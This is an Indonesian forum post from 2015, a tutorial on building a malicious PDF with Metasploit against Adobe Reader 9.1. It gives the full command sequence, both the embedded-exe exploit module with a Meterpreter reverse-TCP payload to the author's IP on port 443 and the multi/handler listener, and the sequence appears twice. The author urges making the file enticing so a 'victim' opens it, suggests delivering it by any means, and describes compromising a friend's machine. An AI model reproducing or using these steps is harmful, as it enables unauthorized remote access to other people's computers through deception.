05-18-2015, 06:41 AM
Oke guys pagi ini saya akan membuat tutorial Exploit Using PDF with Metasploit, berikut bahan-bahan yang diperlukan guys :
![[Image: Screenshot_1.png]](https://2.bp.blogspot.com/-p-HCcerVgDs/VVkG9I98hXI/AAAAAAAAAMs/ILuOhxj-ijQ/s1600/Screenshot_1.png)
Level : Medium, Hard
Testing : Win XP SP3, Windows 7
Vulnerable Application Testing : Adobe Reader 9.1
Requirement :
1. Metasploit Framework
2. Windows or Linux OS(I'm using Kali Linux in this tutorial)
Berikut ini tahap-tahapannya :
Buka terminal anda dan ketikan ini:
![[Image: Screenshot_2.png]](https://2.bp.blogspot.com/-o-r877r3eLA/VVkHSEFRKyI/AAAAAAAAAM0/BXq3eQajC8k/s1600/Screenshot_2.png)
setelah terbuka metasploit anda ketikan ini:
Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya
![[Image: Screenshot_3.png]](https://3.bp.blogspot.com/-SCGW1Xn7zrU/VVkH6KZjB-I/AAAAAAAAAM8/7WSas-_Yg84/s1600/Screenshot_3.png)
Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.
setelah file kita berada di pc korban tinggal ketikan ini di terminal:
![[Image: Screenshot_4.png]](https://2.bp.blogspot.com/-CyRRDmU8LwQ/VVkYtV5QlbI/AAAAAAAAANM/7d1W_GnVfcQ/s1600/Screenshot_4.png)
dan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya
Level : Medium, Hard
Testing : Win XP SP3, Windows 7
Vulnerable Application Testing : Adobe Reader 9.1
Requirement :
1. Metasploit Framework
2. Windows or Linux OS(I'm using Kali Linux in this tutorial)
Berikut ini tahap-tahapannya :
Buka terminal anda dan ketikan ini:
Code:
service postgresql start
service metasploit start
msfconsolesetelah terbuka metasploit anda ketikan ini:
Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename tugas.pdf
set lhost 192.168.1.100
set lport 443
exploitKeterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya
Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.
setelah file kita berada di pc korban tinggal ketikan ini di terminal:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.100 (ip anda)
exploitdan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya